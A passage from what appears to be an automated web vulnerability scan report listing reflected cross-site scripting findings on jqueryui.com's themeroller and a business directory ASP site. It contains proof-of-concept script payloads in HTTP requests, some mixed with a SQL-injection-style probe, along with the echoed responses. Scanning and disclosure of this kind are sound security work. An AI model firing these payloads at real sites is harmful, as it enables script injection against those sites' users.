NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5231d"><script>alert(1)</script>6c1b949ca33 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px5231d"><script>alert(1)</script>6c1b949ca33&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload e67b1<script>alert(1)</script>cfb38d751f7a43364 was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload 5ef5f<script>alert(1)</script>891192eefff was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2 ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 07:22:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 465 Content-Type: text/html Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c ...[SNIP]...
The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload bed0b<script>alert(1)</script>88d4418c010 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80 ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 07:22:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 465 Content-Type: text/html Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80- ...[SNIP]...
The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload d0174<script>alert(1)</script>5d9aae33f2e8c9585 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload 6b529<script>alert(1)</script>2d5124fe105042a4 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload af9ff<script>alert(1)</script>55718c59716 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 07:22:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 465 Content-Type: text/html Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c8 ...[SNIP]...
The value of the CategoryId request parameter is copied into the HTML document as plain text between tags. The payload 4860b<script>alert(1)</script>626b282daaf was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 07:22:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 465 Content-Type: text/html Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1 ...[SNIP]...
The value of the CategoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a59"><script>alert(1)</script>e4b9c9d10edc54c92 was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR17a59"><script>alert(1)</script>e4b9c9d10edc54c92&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125